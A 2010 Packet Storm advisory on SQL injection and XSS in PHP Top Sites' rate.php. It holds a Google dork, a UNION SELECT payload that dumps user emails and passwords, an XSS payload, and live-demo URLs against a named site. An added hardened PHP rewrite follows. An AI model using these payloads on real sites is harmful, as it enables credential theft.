PHP Top Sites Cross Site Scripting / SQL Injection

2010-12-13T00:00:00
ID PACKETSTORM:96671
Type packetstorm
Reporter kAsvee
Modified 2010-12-13T00:00:00

Description

<------------------- header data start ------------------- >  
#############################################################  
PHP Top Sites Multiple SQL/XSS Vulnerability   
#############################################################  
  
# Author : kAsvææ | c0de Hunters  
  
# Name : PHP Top Sites  
  
# Bug Type : SQL/XSS  
  
# Version : All  
  
# Google Dork : "Powered By PHP TopSites"  
  
# Home Page : http://itop10.net/  
  
# You can download it : http://webscripts.softpedia.com/script/Top-Sites/PHP-TopSites-41994.html  
  
  
  
#############################################################  
< ------------------- header data end ------------------- >  
  
< -- bug code start -- >  
  
SQL : "rate.php" (String SQL Injection)  
  
[EXPLOIT] : rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x  
  
  
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x  
  
  
XSS : "rate.php"  
  
[EXPLOIT] : rate.php?site="'><script>alert('xss')</script>  
  
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=%22%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E  
  
  
< -- bug code end -- >  
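Both issues above come in through the same `site` parameter of `rate.php`: the first payload breaks out of a quoted SQL string and appends a `UNION SELECT`, the second breaks out of an HTML attribute and injects a script tag. The advisory does not reproduce the vulnerable source, so the following is an added example, not the PHP Top Sites project's code: a hypothetical hardened replacement for the `rate.php` entry point. The table name `top_sites`, its columns `id`, `name` and `url`, the `$pdo` connection details and the function names are all assumptions made for this example.

```php
<?php
// Added example, not PHP Top Sites' code: a hypothetical hardened rate.php.
// Assumes a `top_sites` table (integer `id`, text `name`, text `url`) and a
// PDO connection; every name here is an assumption for illustration.
declare(strict_types=1);

function parseSiteId(?string $raw): ?int
{
    // Both advisory payloads ("-999.9' UNION ..." and "\"'><script>...")
    // arrive as strings in the `site` parameter. Accepting only a canonical
    // positive integer rejects them before any SQL or HTML is ever built.
    if ($raw === null || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function lookupSite(PDO $pdo, int $siteId): ?array
{
    // Parameterised query: the value is bound, never concatenated into the
    // statement text, so a UNION SELECT in the input cannot alter the query.
    $stmt = $pdo->prepare('SELECT id, name, url FROM top_sites WHERE id = :id');
    $stmt->execute([':id' => $siteId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function renderRatePage(?string $rawSite, PDO $pdo): string
{
    $siteId = parseSiteId($rawSite);
    if ($siteId === null) {
        http_response_code(400);
        return '<p>Invalid site id.</p>';
    }
    $site = lookupSite($pdo, $siteId);
    if ($site === null) {
        http_response_code(404);
        return '<p>Unknown site.</p>';
    }
    // Escape every value reflected into HTML. ENT_QUOTES covers the
    // attribute context the XSS payload targets (it starts with "'>).
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return sprintf(
        '<form method="post" action="rate.php?site=%d">'
        . '<p>Rate <a href="%s">%s</a></p>'
        . '<input type="hidden" name="site" value="%d">'
        . '<button type="submit">Rate</button></form>',
        $site['id'], $e($site['url']), $e($site['name']), $site['id']
    );
}

// Entry point when served by a web server (skipped under the CLI so the
// functions above can be exercised without a database).
if (PHP_SAPI !== 'cli') {
    $pdo = new PDO('mysql:host=localhost;dbname=topsites', 'user', 'pass', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // native server-side prepares
    ]);
    header('Content-Type: text/html; charset=UTF-8');
    echo renderRatePage($_GET['site'] ?? null, $pdo);
}
```

The two defences are independent and both are needed: the integer allow-list stops either payload at the door, while the prepared statement and `htmlspecialchars` protect the query and the page even if a later change lets non-numeric input through. Turning off emulated prepares makes MySQL itself handle the binding rather than the PDO driver building a quoted string client-side.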